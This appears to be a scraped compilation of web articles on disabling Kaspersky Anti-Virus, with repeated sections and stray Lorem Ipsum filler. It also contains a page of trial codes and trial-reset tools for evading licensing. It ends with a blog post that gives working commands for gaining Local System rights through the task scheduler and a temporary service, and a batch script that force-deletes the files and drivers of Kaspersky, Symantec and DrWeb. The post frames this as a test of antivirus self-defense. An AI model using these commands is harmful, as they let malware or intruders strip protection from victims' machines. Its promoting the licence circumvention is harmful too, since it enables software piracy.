2 13 130 0
In certain situations, it becomes necessary to disable Kaspersky. Let's say, if you need to open a certain page, but the program identifies it as potentially dangerous or malicious. Also, many people know that antiviruses quarantine all kinds of cracks and programs for hacking software licenses. In this case, there is no other option but to disable Kaspersky self-defense while working with such utilities.
Before disabling Kaspersky, please note that after this the antivirus becomes inactive, that is, your system is completely unprotected against all kinds of malware and viruses. Thus, you expose yourself to potential danger.
You will need:
In order to disable Kaspersky version 2010, you will need to open the main antivirus window (you can do this by double-clicking on the program shortcut in the taskbar, using the shortcut on the desktop, or by finding Kaspersky Anti-Virus among installed programs in the Start menu).
After that, in the upper right window we look for the “Settings” button. A settings window will appear in front of you, in the left working area of which the “Settings” section will be available. We go into it and uncheck the box next to the line “Enable self-defense”. Confirm the changes by clicking the “OK” button and close the settings menu. It's easier than using Kaspersky Rescue Disk.
In the case of the 2011 version, the procedure will be similar. Just like in the previous case, open the settings window (it is located in the same place). After that, go to the “Self-Defense” tab. We look at the window, which is located on the right side: there we look for the “Enable self-defense” option.
In order to disable Kaspersky 2011, uncheck the box next to this item and save the changes using the “OK” button. After completion, be sure to enable self-defense. If necessary, activate the program or extend the trial version of Kaspersky.
Cautions
As we have already said, by disabling the antivirus self-defense, you will not be able to scan your computer for viruses and expose it to potential danger. So only do this if absolutely necessary, and only if you are one hundred percent sure that the link you want to follow is completely safe; and the program you are about to run or install will not harm your operating system.
Remember that preventing the penetration of malicious software is much easier than later dealing with the consequences of their activity.
As you know, Kaspersky Anti-Virus self-defense is a component that serves as protection for the antivirus itself from malicious software trying to harm the work antivirus program or remove it from your computer. Disable self-defense quite simply - from the settings menu. However, it is not always possible to do this. In this article we will find out what to do if Kaspersky self-defense does not turn off and how to fix it.
How to disable Kaspersky self-defense
Under normal conditions Kaspersky self-defense disabled in the menu Settings → Additionally → Self-defense. To get to the settings, you need to click on the gear icon in the lower left corner of the main program window.
Then press Self-defense, uncheck the inscription Enable self-defense .
Kaspersky self-defense is not active
Once the license to use Kaspersky expires, its operation is suspended and most functions are blocked. Among these functions is Self-Defense. To restore the operation of the protection components, you must activate Kaspersky using a new license or use the following solution to the problem.
1. Uninstall Kaspersky using the Kaspersky Lab product removal utility KAVRemover. Run the utility and agree to the license terms. Select the version of Kaspersky that you want to remove, enter the captcha code in the appropriate field and click Delete .
After removal, the system will prompt you to restart your computer - refuse to reboot. We'll do this later.
HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab
Remove it. Yes, DELETE right click…
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC
delete.
4. Restart your computer.
5. After the system starts, install an antivirus. If you do not have an activation file, you can use the 30-day version of the product. After activation, all components will become available.
01.08.2019
As you know, Kaspersky Anti-Virus self-defense is a component that serves as protection for the antivirus itself from malicious software that tries to harm the operation of the antivirus program or remove it from the computer. Disable self-defense quite simply - from the settings menu. However, it is not always possible to do this. In this article we will find out what to do if Kaspersky self-defense does not turn off and how to fix it.
Kaspersky self-defense
How to disable Kaspersky self-defense
Under normal conditions Kaspersky self-defense disabled in the menu Settings → Additionally → Self-defense. To get to the settings, you need to click on the gear icon in the lower left corner of the main program window.
Then press Self-defense and uncheck the box next to the inscription Enable self-defense .
Kaspersky self-defense is not active
Once the license to use Kaspersky expires, its operation is suspended and most functions are blocked. Among these functions is Self-Defense. To restore the operation of the protection components, you must activate Kaspersky using a new license or use the following solution to the problem.
1 Uninstall Kaspersky using the Kaspersky Lab product removal utility. To do this, run the utility and agree to the license terms. In the window that appears, select the version of Kaspersky that you want to remove, enter the captcha code in the appropriate field and click Delete .
After removal, the system will prompt you to restart the computer; refuse to reboot. We'll do this later.
In certain situations, it becomes necessary to disable Kaspersky. Let's say, if you need to open a certain page, but the program identifies it as potentially dangerous or malicious. Also, many people know that antiviruses quarantine all kinds of cracks and programs for hacking software licenses. In this case, there is no other option but to disable Kaspersky self-defense while working with such utilities.
Before disabling Kaspersky, please note that after this the antivirus becomes inactive, that is, your system is completely unprotected against all kinds of malware and viruses. Thus, you expose yourself to potential danger.
You will need:
In order to disable Kaspersky version 2010, you will need to open the main antivirus window (you can do this by double-clicking on the program shortcut on the taskbar, using the shortcut on the desktop, or by finding Kaspersky Anti-Virus among installed programs in the Start menu).
After that, in the upper right window we look for the “Settings” button. A settings window will appear in front of you, in the left working area of which the “Settings” section will be available. We go into it and uncheck the box next to the line “Enable self-defense”. Confirm the changes by clicking the “OK” button and close the settings menu. It's easier than using Kaspersky Rescue Disk.
In the case of the 2011 version, the procedure will be similar. Just like in the previous case, open the settings window (it is located in the same place). After that, go to the “Self-Defense” tab. We look at the window, which is located on the right side: there we look for the “Enable self-defense” option.
In order to disable Kaspersky 2011, uncheck the box next to this item and save the changes using the “OK” button. After completion, be sure to enable self-defense. If necessary, activate the program or extend trial version Kaspersky.
Cautions
As we have already said, by disabling the antivirus self-defense, you will not be able to scan your computer for viruses and expose it to potential danger. So only do this if absolutely necessary, and only if you are one hundred percent sure that the link you want to follow is completely safe; and the program you are about to run or install will not harm your operating system.
Remember that preventing the penetration of malicious software is much easier than later dealing with the consequences of their activity.
Many users need to disable Kaspersky Anti-Virus for a while. There can be a great many reasons for implementing this procedure: false positives, installation of pirated software and games, software conflicts, launching another antivirus program, etc.
However, not everyone knows how to correctly disable Kaspersky for a while.
In this article we will talk in detail about possible ways disabling this antivirus program.
Temporary deactivation
To temporarily disable your antivirus:
1. Place the cursor over the Kaspersky icon in the tray ( right part taskbar).
2. Click the right mouse button.
3. In the context menu, click “Pause protection...”.
4. Select suspend mode:
“... for a specified time” - disable Kaspersky for the period of time specified in the drop-down list. Click “1 minute” in the first item and select the desired value (3 minutes, 5 minutes .... 3 hours, 5 hours).
“... before restarting the program” - the antivirus is activated only after a restart;
“suspend” - deactivation for an indefinite period: Kaspersky will be disabled until the user turns it on again.
5. After selecting the mode, click the “Pause protection” button.
6. Confirm the action: in the “Attention!” Click “Continue”.
Note. In the confirmation request, you can set whether the request will be repeated in the next 30 minutes. To do this, you need to click the mouse to set the “bird” in the add-on window.
7. After pausing, the message “Protection is not working” will appear. The antivirus tray icon will display the symbol “ Exclamation point"(warning that security software is disabled).
Other ways to disconnect
You can use other options for deactivating the Kaspersky anti-virus program.
Method #1
1. Click on the program icon in the tray. In the menu, click "Settings".
2. On the “General” tab, in the “Protection” column, by clicking the mouse, change the position of the slider to “Off.”
Attention! Here, on the “General” tab, you can disable automatic start antivirus when you turn on the computer.
Method #2
You can also completely unload the security software from memory - close the program.
1. Open the tray menu and select "Exit".
2. Confirm closing the application: in the request panel, click “Continue”.
After activating the exit, the tray icon will disappear. To start the antivirus again, you need to use its directory in the Start menu.
Disabling self-defense
If you need to disable Kaspersky self-defense - a special software mechanism that prevents modifications of antivirus elements - follow these instructions:
1. Go to the program settings and click the “Advanced” tab.
2. Select “Self-Defense” from the list on the right.
3. Click the mouse to remove the check mark in the “Enable self-defense” line.
4. Confirm the request: click “Continue”.
Be careful when disabling Kaspersky Anti-Virus! During the period of its deactivation, your PC has no protection and may be susceptible to all kinds of virus attacks. After completing the necessary procedures, be sure to reactivate the security software. If there is constant need disabling the antivirus when launching a specific application or loading a specific website, it is more advisable to add them to exceptions and not resort to temporary deactivation.
Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry"s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five http://jquery2dotnet.com/ centuries , but also the leap into electronic typesetting, remaining essentially unchanged. It was popularized in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
If you are reading this article, then you are probably asking yourself a question about how to disable Kaspersky self-defense if your license has expired and the self-defense menu item is not active, i.e. nothing can be changed about it. This article will help you disable self-defense in order to make and receive a new key.
How to disable self-defense if you don't have a license
To begin with, it’s worth saying that there are two ways to do this, one way is to remove Kaspersky Anti-Virus, and the second is to loading Windows V safe mode. In fact, both methods will ultimately give the same result. I’ll start by telling you about a method that is more accessible to ordinary users by uninstalling the program.
2. Let's launch this program and agree to the license agreement.
After removing Kaspersky, click OK and restart the computer.
In the line that appears, enter the command regedit and click OK.
Before us is the editor Windows registry. Now here you need to delete some keys (folders). They are located at:
HKEY_LOCAL_MACHINE\SOFTWARE\ KasperskyLab
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ SPC
Those. use it as an explorer, but you need to delete it at the above “folder” addresses KasperskyLab And SPC, to do this you will need to right-click on them and select " Delete".
4. After you have completed deleting these keys, we close the registry editor and now download the desired Kaspersky product from the official Kaspersky website Total Security or Kaspersky Internet Security, install the downloaded Kaspersky anti-virus and launch it. After which we see that the program asks to enter license key or get a trial version, in which case the self-defense tab will become active again and can be turned off.
The second way to disable self-defense if you don’t have a license
It consists in the fact that you need to reboot the computer into safe mode, already in safe mode and do the same operations starting from paragraph 3 this instruction. Those. you won’t need to uninstall Kaspersky before going into the registry. Those. launched in safe mode, deleted the same keys in the registry and rebooted in normal mode, after which we gained access to the blocked self-defense.
The video below clearly shows the process of disabling blocked self-defense, and you can visually evaluate these manipulations; in fact, everything is very simple.
IN Kaspersky Antivirus you can pause protection, that is, disable the operation of all program components for a while, and also resume it.
Pausing application protection only means disabling protection components. Pausing protection does not affect the execution of scans and updates in Kaspersky Antivirus.
2. How to pause protection
You can select one of the following protection suspension modes:
- - protection will be turned on after the specified time interval. The protection will be enabled until the set time if you restart the program or reboot the system:
- If included
- If turned off ).
- - protection will be enabled after restarting the program or rebooting the system:
- If included automatic launch of the program, protection will be enabled automatically.
- If turned off automatic launch of the program; to enable protection, you must launch the program manually ( Start - All Programs - Kaspersky Anti-Virus).
- Suspend- protection will be turned on only when you decide to resume protection.
Pause protection from the context menu
To pause computer protection from context menu program, follow these steps:
- In the window Pause protection select one of the following:
- Pause for a specified time
- Suspend until reboot.
- Suspend.
Pausing protection from Kaspersky Gadget
You can pause protection using the gadget Kaspersky Gadget. For this Kaspersky Gadget must be configured so that one of its buttons is assigned a function Pause protection.
To pause computer protection using Kaspersky Gadget, follow these steps:
- In the window Pause protection select one of the following:
- Pause for a specified time(in the field below, indicate the period of time after which protection will be resumed).
- Suspend until reboot.
- Suspend.
On this page you will find Kaspersky antivirus codes 2013-2018. And also reset utilities trial period(retrials). At the time of publication, all keys and codes are working (verified).
Codes for KIS and KAV 2013, 2014, 2015, 2016, 2017 and 2018
Official trial (trial) codes. Attention! Before activation, reset the trial period from using Kaspersky Reset Trial (look below). Otherwise it does not activate or activates for 30 days or less.
4CH4C-PPFDT-NFK4B-45R69- 90 days (KIS 2014 - 2018)
XZBB7-UZFBN-E8GAD-9GZUF- 60 days (KIS 2013 – 2018)
JHJ7C-C69PX-MQY3J-PKG5B- for 90 days (KAV 2013-2018)
52MFR-XMPS3-RPXBM-K6T5E- for 90 days (KAV 2014-2018)
To activate, use a French proxy.
The proxy must be entered in Settings => Advanced => Network => Proxy server settings (at the very bottom).
After activation, disable the proxy.
JAPXZ-9G9EJ-CSUV2-7YQUS- 45 days
After 90 days, reset the trial period again and reactivate the antivirus for 90 days. And then again and again...
- License dumps
There will be no more dumps. The keys are quickly banned and then the antivirus stops updating. Therefore, now the dump is of no use. - Codes for a year or more
There will be no free long codes either. Don't search on the Internet - you won't find workers. They will be banned quickly, even if they appear.- Now the most working option for KIS- this is activation using trial codes for 90 days, which are located above. When the trial period expires, reset the trial period and activate again. I think it’s not difficult to press a couple of buttons every 3 months.
- For KAV There are journal keys, but they are of little use, because... most often they are given for 30 days. The easiest way is to reset the trial period every month. There is also a 90-day code at this time. Reset the trial period and activate. Everything is like with KIS.
- The same goes for KTS- The easiest way is to reset the trial period every month. Sometimes there are promotions for the distribution of keys for an average of 3 months.
- What's the result?
Freebies as before (keys for 1-3 years, dumps for a year or more, purchased codes) There probably won't be any more. In recent years, Caspers have done great job to combat this. They often monitor sites where keys are distributed in order to immediately ban them. Everything you find on the Internet is mostly either not working or some kind of deception.
Trial Reset for Kaspersky(Retrial - trial period reset):
Kaspersky Reset Trial
Kaspersky Reset Trial - great tool to reset the trial period and activate using a Kaspersky antivirus dump.
Kaspersky Antivirus 2012.
Kaspersky Antivirus 2012
Kaspersky Antivirus 2013
Kaspersky Antivirus 2014
Kaspersky Antivirus 2015
Kaspersky Antivirus 2016
Kaspersky Antivirus 2017
Kaspersky Antivirus 2018
Kaspersky Internet Security 2012
Kaspersky Internet Security 2013
Kaspersky Internet Security 2014
Kaspersky Internet Security 2015
Kaspersky Internet Security 2016
Kaspersky Internet Security 2017
Kaspersky Internet Security 2018
Kaspersky Total Security 2015
Kaspersky Total Security 2016
Kaspersky Total Security 2017
Kaspersky Total Security 2018
Kaspersky Free Antivirus 2016
Kaspersky Free Antivirus 2017
Kaspersky Free Antivirus 2018
Kaspersky PURE 2.0
Kaspersky PURE 3.0
Kaspersky Endpoint Security 8
Kaspersky Endpoint Security 10
Kaspersky Small Office Security 2
Kaspersky Small Office Security 3
Kaspersky Small Office Security 4
Kaspersky Small Office Security 5
Download Kaspersky Reset Trial 5.1
-
KasTrial
KasTrial- a utility for resetting the trial period of Kaspersky antiviruses.
All features of KasTrial:
- Activating Kaspersky using a key
Now you don’t need to enter the code for beta versions with the Internet turned off so that you can activate using the key. - Retrieving the key from Kaspersky
You can display the key file and activation code from Kaspersky. - Ability to completely disable KSN
Kaspersky Security Network (KSN) is a cloud-based antivirus technology. Now you can turn it off completely. - Removing trial reminders
Removes a reminder about using a trial license and a request to buy a license.
- KIS/KAV 2010, 2011, 2012, 2013
- Kaspersky Crystal (Pure) (before Crystal 2012)
- KAV 6.0.4.1424 WKS MP4
- Kaspersky Small Office Security 2 (for file servers and PC)
- Kaspersky Endpoint Security 8
As you know, Kaspersky Anti-Virus self-defense is a component that serves as protection for the antivirus itself from malicious software that tries to harm the operation of the antivirus program or remove it from the computer. Disable self-defense quite simply - from the settings menu. However, it is not always possible to do this. In this article we will find out what to do if Kaspersky self-defense does not turn off and how to fix it.
Kaspersky self-defense
How to disable Kaspersky self-defense
Under normal conditions Kaspersky self-defense disabled in the menu Settings → Additionally → Self-defense. To get to the settings, you need to click on the gear icon in the lower left corner of the main program window.
Then press Self-defense and uncheck the box next to the inscription Enable self-defense .
Kaspersky self-defense is not active
Once the license to use Kaspersky expires, its operation is suspended and most functions are blocked. Among these functions is Self-Defense. To restore the operation of the protection components, you must activate Kaspersky using a new license or use the following solution to the problem.
1 Uninstall Kaspersky using the Kaspersky Lab product removal utility. To do this, run the utility and agree to the license terms. In the window that appears, select the version of Kaspersky that you want to remove, enter the captcha code in the appropriate field and click Delete .
After removal, the system will prompt you to restart the computer; refuse to reboot. We'll do this later.
When using Kaspersky Anti-Virus, situations sometimes arise when protection needs to be turned off for a while. For example, you need to download some required file, but the antivirus system does not let it through. The program has a function that allows you to turn off the protection for 30 minutes using one button; after this time, the program will remind you of itself. This was done so that the user would not forget to enable protection, thereby exposing the system to danger.
Disable Kaspersky Anti-Virus
1. In order to temporarily disable Kaspersky Anti-Virus, go to the program, find "Settings".
2.Go to the tab "Are common". At the very top, change the protection slider to off. Antivirus is disabled.
You can check this in the main program window. When the protection is turned off, we see the inscription "Protection off".
3. The same can be done by right-clicking on the Kaspersky icon, which is located on the bottom panel. Here you can pause protection for a certain period of time or permanently. You can select the option before reboot, that is, the protection will turn on after the computer is rebooted.
How to copy settings and self-defense of Kaspersky 2010
After configuring all Kaspersky Anti-Virus settings at your discretion, you can export or import them for subsequent use of the settings template on other computers where a similar application is installed. For example, copy antivirus settings from home computer and using the created template, quickly configure the application settings on your work computer or on other computers in your home network.
All parameters are saved as a special configuration file. In order to save the current antivirus settings template, you need to perform the operation export given parameters operation of the application by performing the following sequence of actions. In the main application window, click on the " Settings", then in the window that opens, in the menu block on the left, select the section " Options" In the central part of the window, go to the block " ", click on the button " Save" A window will appear on the screen: Selecting a configuration file", in which you need to specify the name of the saved file and the folder in which it will be placed. This file is assigned the extension .cfg (cfg). Close the window by clicking the " Save».
To subsequently import antivirus operating parameters from a previously saved configuration file, in the main application window, click on the button " Settings" and in the window that opens, in the menu block on the left, select the section " Options" Going to the block " Managing program settings", click on the button " Download" In the window that appears, find the saved configuration file, then click on the “ Open».
To protect the application from penetration into its system files and settings for various viruses that try to interfere with its operation, Kaspersky Anti-Virus includes a special self-protection function and protection against remote influence. When using antivirus in Microsoft Windows Vista and 64-bit operating systems this function is limited to managing the application's self-protection mechanism against changing or deleting its own files on the disk and entries in the system registry.
To enable the function self-defense antivirus in the main application window, click on the button Settings" In the window that appears, in the menu block on the left, select the section “ Options" Going to the block " Self-defense", check the box " Enable self-defense».
If you want to block remote access to managing antivirus functions and components, in the “ Self-defense» check the box « Disable the ability to externally control a system service" In this case, if attempts to access the management of antivirus services are detected, a corresponding notification will appear above the application icon in the notification area of the taskbar.
(0)
| Interface overview and general settings | |||||
|---|---|---|---|---|---|
| 1. | Introduction. Installing Kaspersky 2010 | 2:24 | 0 | 5848 | |
| 2. | Overview of the KAV 2010 program context menu | 2:04 | 2 | 1517 | |
| 3. | Main application window | 3:03 | 0 | 1286 | |
| 4. | Setting General Settings | 2:21 | 0 | 1427 | |
| 5. | Import/Export antivirus settings and work with functions... | 3:04 | 0 | 4248 | |
| 6. | Master initial setup antivirus | 2:45 | 0 | 2271 | |
| 7. | Setting up trusted applications | 2:35 | 0 | 2734 | |
| 8. | Setting up exception rules | 2:47 | 0 | 1783 | |
| 9. | Setting up notifications | 2:46 | 0 | 1619 | |
| Working with the "Protection" section | |||||
| 10. | Overview of the “Files and Personal Data” subsection | 2:12 | 0 | 1149 | |
| 11. | Overview of the “Systems and Programs” subsection | 2:56 | 0 | 925 | |
| 12. | Working with the “Networking” section | 2:14 | 0 | 984 | |
| Working with the File Anti-Virus subsection | |||||
| 13. | Overview of the file antivirus component | 2:29 | 0 | 1550 | |
| 14. | Setting the settings of the “File Anti-Virus” subsection | 2:45 | 0 | 789 | |
| 15. | Additional file antivirus settings | 2:52 | 0 | 885 | |
| 16. | Configuring compound file scanning options | 3:13 | 0 | 848 | |
| Working with the Mail Anti-Virus component | |||||
| 17. | Overview of the Mail Anti-Virus component | 3:23 | 0 | 838 | |
| 18. | The main points of the mail antivirus | 3:27 | 0 | 854 | |
| 19. | Exercise additional settings Mail antivirus | 2:50 | 0 | 766 | |
| Working with the Web Anti-Virus component | |||||
| 20. | Overview of the Web Anti-Virus component | 2:15 | 0 | 664 | |
| 21. | Features of the Web Anti-Virus component | 2:24 | 0 | 1064 | |
| 22. | Changing Web Anti-Virus settings | 2:10 | 0 | 936 | |
| 23. | Configuring the parameters of the protection area and response to... | 2:32 | 0 | 743 | |
| 24. | Changing heuristic analysis and optimization parameters... | 3:04 | 0 | 906 | |
| 25. | Checking secure connections | 3:10 | 0 | 3180 | |
| Checking your computer for viruses | |||||
| 26. | Description of the “Virus Scan” function | 2:16 | 0 | 1326 | |
| 27. | Configuring basic scan parameters | 2:56 | 0 | 1323 | |
| 28. | Additional scan options | 2:19 | 0 | 876 | |
| 29. | Running a scan and working with a report | 2:24 | 0 | 2271 | |
| 30. | Setting the launch mode | 2:01 | 0 | 956 | |
| 31. | Setting up optimization and general parameters checks | 1:42 | 0 | 1392 | |
| 32. | Setting up scanning of compound files | 1:58 | 0 | 795 | |
| Working with the "Update" section | |||||
| 33. | Update feature overview | 1:59 | 0 | 2248 | |
| 34. | Key points about using the Update function | 2:47 | 0 | 1170 | |
| 35. | Changing settings and starting the update procedure | 3:09 | 0 | 1514 | |
| 36. | 3:18 | 0 | 5101 | ||
Self-defense of antiviruses or cutting antivirus without a knife
- Antivirus protection
Hi all!
We recently discussed the power of heuristic technologies of modern antiviruses and came to the conclusion that you can’t trust anyone. Even sometimes to myself :)
Today we will talk about another controversial issue of antiviruses - self-defense. Some vendors take this point very seriously, and their products survive even in complex complex cases of active infection, effectively removing virus interceptions, installing themselves into the system, and even subsequently removing already well-established malware. Others believe that active infection is a battle with windmills that does not lead to anything worthwhile, and therefore LiveCD, and in some cases format c:
Let's give both opponents their due: of course, if there is an opportunity to defeat the viral confrontation, that's good. Unless this leads to bsods and system loading for a couple of days. And it is absolutely obvious that with a serious and complex infection it is often impossible to get through the active mass of interceptions, malicious processes at the kernel level and other things - and therefore it is often wiser to treat an inactive system (from a LiveCD or by scanning the hard drive on an uninfected machine), but in the case a motley file infection - and think about completely reinstalling the OS.
But let’s not indulge in arguments - we’ll leave this for the next article :) Let’s talk about something simple: the self-defense of the system, even on a system that is known to be uninfected. And let's accept a priori:
1) there is a comprehensive antivirus+hips+firewall product;
2) the system was not infected, but somehow got into malicious code;
3) the malicious code intends to remove the antivirus or damage it so much as to render it completely inoperable.
The course of action will be the simplest - an attempt to delete vital antivirus files with Local System rights. The idea for this approach is mine good friend Alexey Baranov, who reported about it in closed circles some time ago. Time has passed, let's assume that vendors have caught up - we'll check it out.
On Windows systems, working as an administrator (and this is probably 80% of all systems), obtaining Local System rights is quite simple. Two methods immediately come to mind, well described on the Internet.
Method 1: Using a scheduler.
By default, the task scheduler service runs on all Windows systems. This service runs tasks with the required Local System rights. Then it’s very easy to add a task like this:
at 11:05 c:\killer.bat
and kill.bat will run with Local System rights.
The advantages are obvious: everything is simple and clear. Disadvantage: the user may notice a strange new task in the scheduler, and simply disable this service for security reasons.
Method 1: Create a service.
The essence of the method is to create a service, start it and delete it. In this case, everything is implemented in three lines:
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystem
Moreover, not only is killer.bat will start with IDLE priority, it will also be launched on behalf of Local System.
The method is invisible and does not manifest itself in any way.
At the time of publication of the article, KIS 2010 allowed both methods to pass at the hips level, without even requesting any permissions.
Well, now let's get down to it killer.bat(in our case, it is located in the root on drive C, but it is clear that you can throw it anywhere).
The essence of this file is simple: we delete everything that belongs to the antivirus. So, for Kaspersky 2010 it will be:
net stop srservice
erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"
erase /F /S /Q "%windir%\system32\drivers\kl1.sys"
erase /F /S /Q "%windir%\system32\drivers\klif.sys"
erase /F /S /Q "%windir%\system32\drivers\klbg.sys"
erase /F /S /Q "%windir%\system32\drivers\klim5.sys"
erase /F /S /Q "%windir%\system32\drivers\klmd.sys"
erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"
For Symantec something like (who knows more precisely - correct me, I’m on Kaspersky myself):
net stop srservice
erase /F /S /Q "C:\Program Files\Symantec"
erase /F /S /Q "C:\Program Files\Norton Internet Security"
For Doctor Web:
net stop srservice
erase /F /S /Q "C:\Program Files\DrWeb"
erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"
erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"
erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"
erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"
shutdown -r -f -c "Bye-Bye!!!"
It is clear that a similar script can be written for all antiviruses - the point is to change the paths to vital files.
So, what do we have?
1. KIS 2010 received such damage that it was killed, and the system was left without protection. KIS 2011 is devoid of this sexual weakness - but it’s still a beta...
2. NIS lost several files, but the functionality was not affected; the files were subsequently downloaded and restored when updating from the Internet.
3. DrWeb was not affected at all, which was expected, taking into account the developer’s special emphasis on counteracting the infection. But don’t forget that there is SpiDie for the Web...
At the same time, the hipps of these products calmly missed both variants of manipulation (CIS checked it personally).
CONCLUSIONS
Unfortunately, we have to admit the fact that some of the existing antivirus solutions have a number of vulnerabilities that can be used to damage the protection and actually remove the antivirus from the computer.
It is proposed in the comments to supplement observations and research on other anti-virus products (preferably with Hips, in order to evaluate the level of blocking of actions to obtain Local System rights). I think that the described manipulations are understandable and can be easily reproduced on virtual machines enthusiasts.
- self-defense
- vulnerabilities
- antivirus
Loading...
